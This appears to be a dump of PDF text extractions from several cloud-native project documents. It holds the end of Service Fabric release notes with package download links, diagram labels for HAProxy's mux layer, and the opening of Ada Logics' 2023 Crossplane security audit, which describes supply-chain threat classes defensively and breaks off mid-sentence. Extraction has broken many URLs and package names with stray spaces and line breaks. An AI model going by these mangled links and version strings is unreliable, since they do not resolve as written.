-\nexplorer/pull/198 \nUbuntu 6.5.460.1 \nWindows 6.5.658.9590 \n Feature Increased usability and conveniences \nfor Service fabric explorer \n Brief desc: Copy to clipboard, unhealth y evaluation links, advanced mode \ntoggle. \nFix: \n• Advanced mode toggle moves all but the ‘restart’ option for node \nactions behind this toggle being on. \n• Copy to clipboard allows for easily getting difficult text from SF X. \nUnhealthy evaluation links will now make it easy to navigate to the \naffected entity in SFX. \nGitHub Issue : \nhttps://github.com/microsoft/service -fabric -explorer/pull/204 \nhttps://github.com/microsoft/se rvice-fabric -explorer/pull/203 \nhttps://github.com/microsoft/service -fabric -explorer/pull/197 \n Repositories and Download Links \nThe table below is an overview of the direct links to the packages associated with this release. \nFollow this guidance for setting up your developer environment: \n• Linux: https://docs.microsoft.com/ en-us/azure/service -fabric/service -fabric -get-started -linux \n• Mac: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -mac \n• Wind ows: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started \nArea Package Version Repository Direct Download Link \nService \nFabric \nRuntime Ubuntu Developer Set -up 6.5.460.1 N/A Cluster Runtime: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefabr\nic/pool/main/s/servicefabric \nService Fabric SDK for local cluster \nsetup: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefabr\nic/pool/main/s/servicefabricsdkcommon\n/ \nContainer image: \nhttps://hub.docker.com/r/microsoft/servi\nce-fabric -onebox/ \n Area Package Version Repository Direct Download Link \nRed Hat Developer Set -up 6.1.189.1 N/A Cluster Runtime: \nhttps://packages.microsoft.com/yumrep\nos/microsoft -rhel7.4 -prod/ \n \nService Fabric SDK for local cluster \nsetup: \nhttps://packages.microsoft .com/yumrep\nos/microsoft -rhel7.4 -\nprod/servicefabric_sdkcommon_1.1.2.r\npm \n \nWindows Developer Set -up 6.5.658.9590 N/A https://download.microsoft.com/downlo\nad/F/9/3/F93AF848 -BE1C -4790 -8B24 -\n32CF63BA8E86/MicrosoftServiceFabri\nc.6.5.658.9590. exe \nService \nFabric for \nWindows \nServer Service Fabric Standalone \nInstaller Package 6.5.658.9590 N/A https://download.microsoft.com/downlo\nad/8/3/6/836E3E99 -A300 -4714 -8278 -\n96BC3E8B5528/6. 5.658.9590/Microsof\nt.Azure.ServiceF abric.WindowsServer.\n6.5.658.9590.zip \nService Fabric Standalone \nRuntime 6.5.658.9590 N/A https:/ /download.microsoft.com/downlo\nad/B/0/B/B0BCCAC5 -65AA -4BE3 -\nAB13 -\nD5FF5890F4B5/6.5.658.9590/Micro sof\ntAzureServiceFabric.6.5.658.9590.cab \n.NET SDK Windows .NET SDK 3.4.658 N/A https://download.microsoft.com/downlo\nad/F/9/3/F93AF848 -BE1C -4790 -8B24 -\n32CF63BA8E86/MicrosoftServiceFabri\ncSDK.3.4.658.msi \nMicrosoft.ServiceFabric 6.5.658 N/A https://www.nuget.org \n Area Package Version Repository Direct Download Link \nReliable Services and Reliable \nActors \n• Microsoft.ServiceFabr\nic.Services \n• Microsoft.ServiceFabr\nic.Services.Remoting \n• Microsoft.ServiceFabr\nic.Services.Wcf \n• Microsoft.ServiceFabr\nic.Actors \n• Microsoft.ServiceFabr\nic.Actors.Wcf 3.4.658 https://github.com/Azure/service -\nfabric -services -and-actors -dotnet https://www.nuget.org \nASP.NET Core Service Fabric \nintegration \n• Microsoft.Serv iceFabr\nic.Services.AspNetCor\ne.* 3.4.658 https://github.com/Azure/service -\nfabric -aspnetcore https://www.nuget.org \nData, Diagnostics and Fabric \ntranspo rt \n• Microsoft.ServiceFabr\nic.Data \n• Microsoft.ServiceFabr\nic.Data.Interfaces \n• Microsoft.ServiceFabr\nic.Diagnostics.Internal \n• Microsoft.ServiceFabr\nic.FabricTransport.Inte\nrnal 3.4.658 N/A https://www.nuget.org \n \nMicrosoft.Ser viceFabric.Data.\nExtensions 3.4.658 N/A https://www.nuget.org \n \nJava SDK Java SDK 1.0.5 N/A https://mvnrepository.com/art ifact/co\nm.microsoft.servicefabric/sf -\nactors/1.0.5 \n Area Package Version Repository Direct Download Link \nVisual \nStudio Visual Studio 2017 Tools for \nService Fabric 2.5.20608.1 N/A Included in Visual Studio 2017 Update \n7 (15.7) and above \nVisual Studio 2015 Tools for \nService Fabric 2.5.20615.1 N/A See locali zed download links below \nEclipse Service Fabric plug -in for \nEclipse 2.0.7 N/A N/A \nYeoman Azure Service Fabric Java \ngenerator 1.0.7 https://github.com/Azure/generator\n-azuresfjava N/A \nAzure S ervice Fabric C# \ngenerator 1.0.9 https://github.com/Azure/generator\n-azuresfcsharp N/A \nAzure Service Fabric guest \nexecutables generator 1.0.1 https://github.com/Azure/generator\n-azuresfguest N/A \nAzure Service Fabric \nContainer generators 1.0.1 https://github.com/Azure /generator\n-azuresfcontainer N/A \nCLI Service F abric CLI 8.0.0 https://github.com/Azure/service -\nfabric -cli https://pypi.python.org/pypi/sfctl \nPowerShel\nl AzureRM.ServiceFabric 0.3.1 5 https://github.com/Azure/azure -\npowershell/tree/preview/src/Resou\nrceManager/ServiceFabric https://www.powershellgallery.com/pa\nckages/AzureRM.ServiceFabric/0.3.15 \n \nVisual Studio 2015 Tool for Service Fabric – localized download links \nNOTE: The below download links are for the 2.5.20615.1 release of Visual Studio 2015 Tools for Service Fabric. \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/Microsoft AzureServiceFabricTools.VS140.de -de.msi \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24-32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.en -us.msi \nhttps://download.microsoft.com/download/F/ 9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.es -es.msi \nhttps://download. microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.fr -fr.msi \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.it -it.msi \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.ja -jp.msi \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabr icTools.VS140.ko -kr.msi \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/ MicrosoftAzureServiceFabricTools.VS140.ru -ru.msi \nhttps://download.microsoft.com/download/F/9/3/F93AF848 -BE1C-4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.zh -cn.msi \nhttps://download.microsoft.com/do wnload/F/9/3/F93AF848 -BE1C -4790 -8B24 -32CF63BA8E86/MicrosoftAzureServiceFabricTools.VS140.z h-tw.msi \n " } ]
{ "category": "Orchestration & Management", "file_name": "muxes.pdf", "project_name": "HAProxy", "subcategory": "Service Proxy" }
[ { "data": "Transport\nI/O taskletapplication\nmux−>subscribe(SUB_RECV)\nMUX\nStream IDStream ID\ntasklet_wakeup() tasklet_wakeup()mux−>snd_buf()mux−>rcv_buf()\nxprt−>snd_buf(mbuf)xprt−>rcv_buf(dbuf)HTX contents when mode==HTTPtasklet_wakeup() tasklet_wakeup()\nmux−>subscribe(SUB_SEND)mux streams mux=conn−>mux\nTransport\nencoding/decoding function\ntransport layer multiplexer (MUX/DEMUX)general processing function\nstream buffer (byte−level FIFO)xprt−>subscribe(SUB_RECV) xprt−>subscribe(SUB_SEND)stconn\n(eg: checks, streams)connection = sc−>sedesc−>connNotes:\nsnd_buf() will move the\nbuffer (zero−copy) when\nthe destination is empty.\n− the application is also\nis sc−>app with sc−>app_ops\n− transport layers (xprt) are\nstackable. conn−>xprt is\nthe topmost one.called the app layer and− mux−>rcv_buf() and\nencode encode encode encode\ndecode decode decode decode\nmux_io_cb mux_io_cbsc_conn_io_cb\nchannel bufrxbuf\ndbufmbuf DEMUX" } ]
{ "category": "Orchestration & Management", "file_name": "ADA-security-audit-23.pdf", "project_name": "Crossplane", "subcategory": "Scheduling & Orchestration" }
[ { "data": "PRESENTS \nC r o s s p l a n e\ns e c u r i t y\na u d i t\nIn\ncollaboration\nwith\nthe\nCrossplane\nmaintainers,\nOpen\nSource\nTechnology\nImprovement\nFund\nand\nThe\nLinux\nFoundation\nAuthors\nAdam\nKorczynski\n<\nadam@adalogics.com\n>\nDavid\nKorczynski\n<\ndavid@adalogics.com\n>\nDate:\n27th\nJuly\n2023\nThis\nreport\nis\nlicensed\nunder\nCreative\nCommons\n4.0\n(CC\nBY\n4.0)\nT able\nof\ncontents\nTable\nof\ncontents\n2\nExecutive\nsummary\n3\nAudit\nScope\n5\nThreat\nmodel\nformalisation\n6\nThreat\nactors\n12\nAttacker\nobjectives\n13\nCluster\nhardening\n15\nFuzzing\n17\nIssues\nfound\n19\nSLSA\n45Ex ecutive\nsummary\nThis\nreport\ncontains\nthe\nresults\nfrom\nCrossplaneʼs\n2023\nsecurity\naudit\ncarried\nout\nby\nAda\nLogics.\nThe\naudit\nwas\nfunded\nby\nthe\nCloud\nNative\nComputing\nFoundation\nand\nwas\nfacilitated\nby\nthe\nOpen\nSource\nTechnology\nImprovement\nFund.\nThe\nengagement\nwas\na\ntime-based,\nholistic\nsecurity\naudit\nthat\nhad\nthe\nfollowing\nhigh-level\ngoals:\n1.\nFormalise\na\nthreat\nmodel\nof\nCrossplane\n2.\nCarry\nout\na\nmanual\ncode\naudit\nof\nCrossplane\n3.\nReview\nCrossplaneʼs\nfuzzing\nsuite\nagainst\nthe\nthreat\nmodel\nfrom\ngoal\n#1\n4.\nReview\nCrossplaneʼs\nSLSA\ncompliance\nDuring\nthe\nthreat\nmodelling\ngoal,\nwe\nfound\nthat\nthe\ncontainer\nimage\nregistry\nrepresented\na\nsignificant\nattack\nsurface\nfor\nCrossplane.\nThis\nguided\nthe\nwork\nin\ngoals\n#2\nand\n#3\nto\nconsider\na\nspecific\nset\nof\nattacks\nthat\nhave\nreceived\nincreased\nattention\nin\nrecent\nyears:\nSupply\nchain\nattacks.\nThe\nfindings\nfrom\nthe\nthreat\nmodelling\ncombined\nwith\nthe\nmanual\ncode\nauditing\ngoal\nresulted\nin\nseveral\nfindings\nfrom\nthe\nsupply\nchain\nclass\nof\nvulnerabilities\nthat\nwere\nreachable\nfrom\nthe\ncontainer\nimage\nregistry.\nTwo\nof\nthe\nissues\nwere\nassigned\nCVEs\nwith\nLow\nand\nHigh\nseverity.\nAt\nthe\ncompletion\nof\nthe\naudit,\nCrossplane\nhas\nfixed\nall\nissues\nexcept\nfor\na\nsingle\none\nwhich\nimpacts\nan\nalpha\nfeature.\nAda\nLogics\nadded\n4\nfuzzers\nto\nCrossplaneʼs\nfuzzing\nsuite.\nThese\nfuzzers\ntarget\nparts\nof\nCrossplane\nthat\nwe\nfound\nto\nbe\nexposed\nfrom\nattacks\nto\nthe\nregistry\nduring\nthe\nthreat\nmodelling\ngoal\nof\nthe\naudit.\nWe\nadded\nthe\nfuzzers\nto\nthe\npackages\nthat\nthey\ntarget\nin\nthe\nCrossplane\nrepository.\nCrossplane\nis\nintegrated\ninto\nOSS-Fuzz\nin\nsuch\na\nway\nthat\nall\nfuzzers\nfrom\nthe\nCrossplane\nand\nCrossplane-runtime\nrepositories\nare\nincluded\nduring\nOSS-Fuzz\nbuild\ncycles.\nAs\nsuch,\nthe\nfuzzers\nwe\nadded\nin\nthis\naudit\nrun\ncontinuously\nas\nwell\nas\nin\nCrossplaneʼs\nCI.\nThe\nSLSA\ngoal\nof\nthe\naudit\nfound\nthat\nCrossplane\nperforms\nwell\non\nall\naccounts\nexcept\nfor\nprovenance\ndistribution\nalong\nwith\nreleases.\nAdding\nprovenance\nwill\nallow\nadopters\nto\navoid\nissues\nin\ntheir\nsupply\nchain\nby\nverifying\nthe\nCrossplane\nartefacts\nagainst\nprovenance\nattestations.Results\nsummarised\n5\nnew\nfuzzers\nadded\nto\nCrossplaneʼs\nfuzzing\nsuite\n16\nissues\nsecurity\nfound\n2\nCVEʼs\nassigned\nAll\nissues\nminus\n1\n(in\nan\nalpha\nfeature)\nare\nfixed\nat\nthe\nend\nof\nthe\naudit\nby\nthe\nCrossplane \nteamProject\nSummary\nThe\nauditors\nof\nAda\nLogics\nwere:\nName\nTitle\nEmail\nAdam\nKorczynski\nSecurity\nEngineer,\nAda\nLogics\nAdam@adalogics.com\nDavid\nKorczynski\nSecurity\nResearcher,\nAda\nLogics\nDavid@adalogics.com\nThe\nCrossplane\ncommunity\nmembers\ninvolved\nin\naudit\nwere:\nName\nTitle\nEmail\nPhilippe\nScorsolini\nSenior\nSo\u0000ware\nEngineer, \nUpbound\nphilippe.scorsolini@upbound.io\nJared\nWatts\nCommunity\nManager,\nUpbound\njared@upbound.io\nJean\ndu\nPlessis\nSenior\nEngineering\nManager, \nUpbound\njean@upbound.io\nNic\nCope\nSenior\nPrincipal\nEngineer, \nUpbound\nnegz@upbound.io\nThe\nfollowing\nfacilitators\nof\nOSTIF\nwere\nengaged\nin\nthe\naudit:\nName\nTitle\nEmail\nDerek\nZimmer\nExecutive\nDirector,\nOSTIF\nDerek@ostif.org\nAmir\nMontazery\nManaging\nDirector,\nOSTIF\nAmir@ostif.org\nAudit\nScope\nThe\nfollowing\nassets\nwere\nin\nscope\nof\nthe\naudit.\nRepository\nhttps://github.com/crossplane/crossplane\nLanguage\nGo\nRepository\nhttps://github.com/crossplane/crossplane-runtime\nLanguage\nGoThreat\nmodel\nformalisation\nIn\nthis\nsection,\nwe\npresent\nthe\nthreat\nmodelling\nwe\ndid\nas\npart\nof\nthe\naudit.\nThreat\nmodelling\nis\na\nprocess\nto\nidentify\npotential\nsecurity\nrisks\nor\nthreats\nto\na\nsystem.\nWe\nanalysed\nCrossplaneʼs\ncomponents,\ndata\nflows\nand\nattack\nvectors\nto\nidentify\nhow\nthreat\nactors\ncould\nseek\nto\ncompromise\nCrossplane\nand\nwhich\ngoals\nthey\nwould\nattempt\nto\nachieve.\nDuring\nthe\naudit,\nthreat\nmodelling\nprogressed\nalongside\nother\nefforts;\nWe\nstarted\nwith\nan\ninitial\nthreat\nmodel\nof\nthe\nassets\nin\nscope,\nand\nas\nthe\naudit\nprogressed,\nthe\nmanual\nauditing\ncontributed\nto\na\nclearer\nunderstanding\nof\nthe\nthreat\nmodel.\nVice\nversa,\nthe\nthreat\nmodelling\ncontributed\nto\nidentifying\nmore\nsecurity\nissues\nin\nCrossplaneʼs\ncode\nbase.\nThe\naudit\ndrew\norganically\ntowards\nthe\nthreats\nfrom\nCrossplaneʼs\nsupply\nchain\nattack\nvectors.\nThe\naudit\nwas\nnot\na\ndedicated\nsupply\nchain\naudit,\nhowever,\nwe\nfound\nthis\nvector\nto\nbe\nimportant\nand\nexposed\nto\nCrossplane.\nCrossplane\nhas\nmany\ncharacteristics\nof\na\npackage\nmanager\nconsidering\nDebians\ndefinition:\n“\nA\npackage\nmanager\nkeeps\ntrack\nof\nwhat\nso\u0000ware\nis\ninstalled\non\nyour\ncomputer,\nand\nallows\nyou\nto\neasily\ninstall\nnew\nso\u0000ware,\nupgrade\nso\u0000ware\nto\nnewer\nversions,\nor\nremove\nso\u0000ware\nthat\nyou\npreviously\ninstalled.\nAs\nthe\nname\nsuggests,\npackage\nmanagers\ndeal\nwith\npackages:\ncollections\nof\nfiles\nthat\nare\nbundled\ntogether\nand\ncan\nbe\ninstalled\nand\nremoved\nas\na\ngroup.\n”\nhttps://www.debian.org/doc/manuals/aptitude/pr01s02.en.html\nCrossplane\nhas\nall\nof\nthese\nqualities\nwhich\nmakes\nit\nan\nideal\ntarget\nfor\nsupply\nchain\nattacks.\nPackage\nmanagers\nare\nresponsible\nfor\nfetching\nso\u0000ware\npackages\nfrom\ninternal\nor\nremote\nsources\nand\ninstalling\nthem\nin\nan\nenvironment\nso\nthat\nthey\ncan\nbe\nexecuted\nlater.\nThis\nis\nby\ndefault\nan\nexposed\nattack\nsurface\nsince\nattackers\nhave\na\nwide\nrange\nof\ntechniques\nand\ntactics\nat\ntheir\ndisposal\nto\ncomprise\nthe\npackage\nmanager\nitself\nor\nits\nusers.\nWe\nsee\nCrossplane\nas\na\npackage\nmanager\nfor\ncontainer\nimages.\nCrossplane\nfetches\nthe\nimages\nfrom\nremote\nsources.\nOver\nthe\nlast\nfew\nyears\nthe\nsecurity\ncommunity\nhas\nformalised\na\nseries\nof\nattack\nvectors\nfor\nso\u0000ware\nsystems\nthat\nhandle\ncontainer\nimages\nfrom\nremote\nsources\nwhich\nwe\nhave\nincluded\nin\nthe\nthreat\nmodel\nbelow.\nA\u0000er\nwe\nenumerate\nthe\nattack\nvectors,\nwe\ndetail\nhow\nattackers\ncan\nput\nthemselves\nin\na\nposition\nto\nlaunch\nan\nattack\nthrough\nthis\nattack\nvector.\nWe\nfinally\npresent\nthe\nthreat\nactors\nand\ntheir\nobjectives\nthat\ncould\nseek\nto\nexploit\nsecurity\nholes\nin\nCrossplane.Supply\nchain\nattacks\nIn\nrecent\nyears,\nmuch\nwork\nhas\nbeen\nput\ninto\nidentifying\nhow\nattackers\ncan\nseek\nto\ncompromise\nthe\nso\u0000ware\nsupply\nchain.\nKnown,\nhigh-impact\nattacks\nfrom\nsuccessful\ncompromises\nof\nusersʼ\nso\u0000ware\nsupply\nchain\nhave\nsparked\nan\ninterest\nin\nunderstanding\nthis\nattack\nvector\nwhich\nhas\nled\nthe\ncommunity\nto\nformalising\na\nseries\nof\nsupply\nchain\nspecific\nthreats\nagainst\nso\u0000ware\nsystems\nthat\nconsume\n3rd-party\nso\u0000ware\npackages.\nCrossplane\nboth\nconsumes\n3rd-party\npackages\nbut\nalso\nimplements\ninfrastructure\nthat\nfacilitates\nthe\nlifecycle\nof\nconsuming\n3rd-party\nso\u0000ware\npackages\nfor\nthe\nuser.\nBoth\nsides\nare\ncritical\nto\nharden\nagainst.\nEndless\ndata\nattack\nAn\nattack\nwhere\nan\nattacker\ntricks\na\nclient\ninto\ndownloading\nan\nendless\nstream\nof\ndata\nwhen\nthe\nclient\nrequests\nit.\nThe\nresulting\nimpact\nis\nthat\nthe\nmachine\non\nwhich\nthe\nclient\nis\nrunning\nwill\nrun\nindefinitely\nwithout\ncompleting\nthe\ntask\nthus\npreventing\nthe\nservice\nfrom\ncarrying\nout\nother\ntasks.\nCrossplane\nis\nexposed\nto\nthis\nattack\nvector\nin\ncase\nan\nattacker\ncan\ncompromise\nthe\nregistry\nfrom\nwhich\nCrossplane\nfetches\nimages.\nRollback\nattacks\nA\nrollback\nattack\nis\nwhere\na\nthreat\nactor\ncan\ntrick\na\nclient\ninto\ninstalling\nolder\nversions\nof\na\ngiven\nso\u0000ware\nartefact.\nThe\nactor\nwould\nbe\ninterested\nin\ndoing\nthis\nin\ncase\nthey\nknew\nabout\nvulnerabilities\nin\nolder\nversions\nof\na\nso\u0000ware\nartefact.\nThey\nwould\nthen\nprevent\nupdates\nof\nthe\nartefact\nand\nexploit\nthe\nvulnerabilities\nof\nthe\nold\nversion.\nCrossplane\nusers\nspecify\nimages\nby\neither\ntags\nor\ndigests.\nSpecifying\nan\nimage\nwith\na\ndigest\nis\nthe\nbest\nsecurity\npractice,\nhowever,\nif\nan\nattacker\ncompromises\nthe\nregistry,\nthey\nmay\nbe\nable\nto\ntamper\nwith\nthe\nimage\nif\nCrossplane\nlacks\nvalidation\nagainst\nthe\nrequested\ndigest.\nFreeze\nattacks\nThis\nis\nan\nattack\nwhere\nan\nactor\nprevents\na\nclient\nfrom\nupdating\nso\u0000ware\nartefacts.\nThe\nthreat\nactor\ndoes\nthis\nby\npresenting\nfiles\nto\nthe\nclient\nthat\nthe\nclient\nis\nalready\naware\nof\nand\nis\ntricked\ninto\nconcluding\nthat\nthere\nis\nno\nupdate\nto\nthe\nartefact.\nA\nfreeze\nattack\ncan\nbe\nenabled\nby\na\nvulnerability\nthat\nallows\nthe\nactor\nto\ncarry\nout\na\nMan-in-the-Middle\nattack,\nwhere\nthe\nactor\nintercepts\nrequests\nbetween\nthe\nclient\nand\nthe\ncentral\nrepository\nwhen\nthe\nclient\nchecks\nfor\nupdates.\nTo\nupdate\na\nCrossplane\npackage,\nusers\nare\nrequired\nto\nmanually\nupdate\nmanifest\nfiles\nwhich\nwill\nprompt\nCrossplane\nto\npull\nthe\nnew\npackage.\nAn\nattacker\nwho\ncan\nblock\nupgrades\nwill\nbe\nable\nto\nlaunch\na\nfreeze\nattack\nagainst\nCrossplane.\nArbitrary\npackage\nattacks\nAn\narbitrary\npackage\nattack\nis\nwhere\nan\nattacker\ncan\ntrick\na\nclient\ninto\ndownloading\na\nso\u0000ware\nartefact\nof\nthe\nattackers\nchoice.\nIn\na\nsuccessful\narbitrary\npackage\nattack,\nthe\nclient\nwill\nnot\nbe\naware\nthat\nit\ndownloaded\nthe\nwrong\nartefact.\nThere\nare\nseveral\nways\nanattacker\ncould\nattempt\nthis\nagainst\nCrossplane:\nImage\ntampering\nis\none\nway\nsince\na\nmaliciously\nmodified\nimage\ncould\nbe\nconsidered\nan\narbitrary\npackage.\nAttackers\ncould\nalso\nseek\nto\ncompromise\nthe\ndependencies\nof\nCrossplane\npackages\nsince\nCrossplane\npulls\ndependencies\nwhen\ninstalling\nCrossplane\npackages.\nTyposquatting\nattacks\nA\ntyposquatting\nattack\nis\nwhen\nan\nattacker\ntricks\na\nclient\ninto\ndownloading\nmalicious\nso\u0000ware\nartifacts\nby\ntyping\na\nname\nthat\nclosely\nresembles\nthe\nsafe\nartifacts\nname\nbut\nis\nstill\ndifferent.\nTyposquatting\nattacks\nare\nhard\nfor\nCrossplane\nto\nharden\nagainst,\ngiven\nthat\nCrossplane\ntrusts\nthe\npackage\nname.\nCrossplane’s\nsupply\nchain\nattack\nvectors\nAn\nattacker\ncan\ntake\nseveral\npositions\nto\nlaunch\na\nsupply\nchain\nattack.\nIn\nthis\npart,\nwe\npresent\nhow\nan\nattacker\ncould\nobtain\nsuch\na\nposition.\nCompromising\nthe\nregistry\nAn\nattacker\ncan\ncompromise\nthe\nregistry\nand\ncontrol\nthe\ndata\nthe\nregistry\nresponds\nto\nrequests\nmade\nto\nit.\nThis\nlevel\nof\ncompromise\nallows\nthe\nattacker\nto\nreturn\nany\ndata\nto\nCrossplane.\nCompromising\nthe\npackage\nin\nthe\nregistry\nAn\nattacker\ncan\ncompromise\nthe\npackage\nthat\nexists\nin\nthe\nregistry.\nThis\nrequires\nthe\nattacker\nto\ncompromise\neither\nthe\nregistry\nitself\nor\nthe\nmaintainer\nof\nthe\npackage.\nA\nsuccessful\nattack\nwould\nrequire\nthat\nneither\nthe\nuser\nnor\nthe\npackage\nmanager\nvalidate\nthe\npackage\nat\ndownload\ntime.\nThis\ncould\nfor\nexample\nbe\nenabled\nby\ncompromising\nthe\nvendor\naccount\nthat\nuploads\nand\nmanages\na\ngiven\npackage\nat\nthe\nregistry.\nCompromising\nthe\ninfrastructure\ndelivering\nthe\npackage\nAn\nattacker\ncan\ncompromise\nthe\ninfrastructure\ndelivering\nthe\npackage\nto\nCrossplane.\nThere\nare\ntwo\nimportant\npieces\nof\ninfrastructure\nto\nCrossplane\nin\nthis\nattack\nvector:\n1.\nThe\ncloud\nprovidersʼ\ninfrastructure.\nAn\nattacker\ncould\ncompromise\nthe\ncloud\nproviders\ninfrastructure\nto\nget\naccess\nto\nthe\nusers\ncluster.\n2.\nCrossplaneʼs\ngo-containerregistry\ndependency.\nCrossplane\nrelies\non\nthe\ngithub.com/google/go-containerregistry\nlibrary\nto\nfetch\nimages.\nVulnerabilities\nin\ngo-containerregistry\nthat\nCrossplane\ncan\nreach\ncould\nimpact\nCrossplane\nin\nthe\nsame\nmanner\nas\nif\nthe\ncode\nlived\nin\nCrossplaneʼs\nown\nrepository.Crossplane\nthreat\nscenario\nIn\nthis\nsection,\nwe\nexemplify\nthe\nabove\nobservations\nwith\na\nthreat\nscenario.\nThe\npurpose\nis\nto\nconsider\na\ntangible\nseries\nof\nobservations\nthat\nan\nattacker\nwould\nmake\nto\nlook\nfor\nvulnerabilities\nto\nexploit\nin\nCrossplane.\nThe\nprevious\nsections\nin\nour\nthreat\nmodelling\nhave\ntaken\na\nhigh-level\napproach,\nand\nthis\nsection\naims\nto\nmake\nthese\nmore\ntangible\nwith\nan\nexample\nthreat\nscenario.\nCrossplane\ninfrastructure\nteams\nmanage\npackages\nthrough\ncontainer\nimage\nreferences.\nThe\ninfrastructure\nteam\nwill\ninput\na\nreference\nto\nCrossplane\nwhich\nwill\nthen\ndownload\nan\nimage\nfrom\na\nregistry\nspecified\nin\nthe\nreference.\nFor\nexample,\nwhen\ncreating\na\nProvider\nor\nConfiguration,\nthe\nuser\nwill\nspecify\na\npackage\nwhich\nis\nthe\nimage\nreference:\nhttps://pkg.go.dev/github.com/crossplane/crossplane/apis/pkg/v1beta1#PackageRevisionSpec\nThe\nCrossplane\nrevision\ncontroller\nwill\nfetch\nthe\nimage\ndefined\nin\nthePackageSpec\nfrom\nits\nregistry.\nAs\nsuch,\nwhen\nCrossplane\ndeals\nwith\ncontainer\nimages,\nthere\nare\ntwo\ninputs\nto\nCrossplane\none\nof\nwhich\nthe\nCrossplane\nadmin\ncontrols,\nand\none\nof\nwhich\nthe\nadmin\ndoes\nnot\ncontrol.\n1.\nThe\ninfrastructure\nteam\ninputs\nthe\nimage\nreference\nto\nCrossplane.\nIn\nthis\nstep,\nthere\nis\nno\nchange\nin\ntrust.\n2.\nCrossplane\nsends\na\nrequest\nto\nthe\nregistry\nwhich\nresponds\nwith\nthe\nCrossplane\npackage.\nIn\nthis\nstep,\nthe\ntrust\nflows\nhigh\nto\nlow\nwhen\nCrossplane\nsends\nthe\nrequest\nto\nthe\nregistry\nand\nlow\nto\nhigh\nwhen\nthe\nregistry\nresponds\nwith\nthe\npackage:\nIn\nthis\nworkflow,\nCrossplane\nexpects\nthe\nregistry\nto\ncorrectly\nand\nsafely\nhandle\nthe\nrequest\nfrom\nCrossplane\nto\nthe\nregistry\nand\nto\nreturn\nthe\ncorrect\nimage\nbased\non\nthe\nreference.\nEven\nif\nthe\ninfrastructure\nteam\nhas\nspecified\nthe\ncorrect\nimage\nreference\nusing\na\ndigest\nwhich\nis\nmore\nsecure,\nthe\nattack\nsurface\nfrom\nthe\nregistry\nexists.\nFor\nexample,\nif\nan\nattacker\nhas\ncompromised\nthe\nregistry,\nthey\ncan\nchoose\nto\nignore\nthe\ndigest\nand\nreturn\nan\narbitrary\ndata\nblob\nto\nCrossplane.\nThis\nmakes\nthe\nregistry\nan\nideal\ntarget\nfor\nsupply\nchain\nattacks.\nAttackers\nwill\nlook\nfor\nways\nto\ncompromise\nregistries\nas\nwell\nas\nmissing\nhardening\nin\nCrossplaneʼs\nPackage\nfetching\nroutines.\nIf\nan\nattacker\nhas\ncompromised\nthe\nregistry,\nthey\ncan\npotentially\nfully\ncontrol\nthe\npackage\nthat\nCrossplane\nreturns.\nIn\nthis\nscenario,\nCrossplane\nshould\nbe\nhardened\nagainst\nevery\npossible\nattack\nvector\nfrom\nthe\nregistry,\nwhich\nincludes\nthe\nsupply\nchain\nattacks\nlisted\nabove\nas\nwell\nas\nnon-supply\nchain-specific\nprivilege\nescalations.\nCrossplane\nClaims\nClaims\nin\nCrossplane\nare\ndeclarative\nrequests\nfor\na\ngiven\ncloud\nresource\nor\nservice.\nThey\nallow\nPlatform\nEngineers\nto\ndefine\nthe\nspecific\nresources\nthat\ndevelopers\ncan\nprovision\nand\naccess,\nwhile\nalso\nallowing\ndevelopers\nto\ndefine\ntheir\ndesired\ncharacteristics\nand\nparameters\nfor\nthose\npermitted\nresources.\nWhen\na\nuser\nmakes\na\nclaim,\nCrossplane\nprovisions\nand\nmanages\nthe\nrequested\nresources\nbased\non\nthe\nprovided\nspecifications.\nThis\nseparation\nof\nconcerns\nis\na\nmajor\nadvantage\nof\nCrossplane\nwhich\nis\nintended\nto\nallow\nsafe\nself-service\nprovisioning\nof\nresources\nby\ndevelopers.\nA\nvital\nsecurity\nassumption\nfor\nclaims\nis\nthat\nusers\nconsume\nthe\nresources\nthat\nthey\nbelieve\nthey\nconsume.\nIf\nan\nattacker\ncan\ncause\nthat\nassumption\nto\nbe\nwrong,\nthey\ncan\nobtain\nan\nadvantageous\nsecurity\nposition.\nFor\nexample,\na\nthreat\nactor\ncould\ninterfere\nwith\nhow\nCrossplane\nhandles\nclaims\nto\nattempt\nto\ntamper\nwith\nthe\nresource\nthat\nthe\nuser\nis\nexpecting.\nBy\ncausing\nCrossplane\nto\nsupply\na\ndifferent\nresource\nthan\nthe\nrequested\none,\nthe\nthreat\nactor\nwould\nbe\nable\nto\nbreach\nthe\nsecurity\nof\nCrossplane.\nA\nserious\nbreach\nrelated\nto\ncomposite\nresources\nis\nthe\ncase\nwhere\na\nuser\n-\nwho\nis\nnot\na\ncluster\nadmin\n-\ncan\nassume\nthe\nrole\nof\nthe\nplatform\nteam\nand\nobtain\nprivileges\nto\nconfigure\nthe\nCompositeResourceDefinitions\nof\nthe\ncluster.\nThis\ncould\nlead\nto\nfull\ncluster\nbreach\nas\nthe\nthreat\nactor\ncould\nreplace\nexisting\nCompositeResourceDefinitions\nwith\nmalicious\nones\nor\nadd\nnew\nCompositeResourceDefinitions\nthat\ncould\nbe\nused\nto\nfurther\nescalate\nprivileges.\nThis\nattack\nvector\nis\nparticularly\nsevere\nif\nthe\nuser\ncan\ndo\nthis\nby\nway\nof\na\nclaim\nsince\nclaims\nare\nthe\nAPI\nthat\nlimited\nprivilege\nusers\nare\nmeant\nto\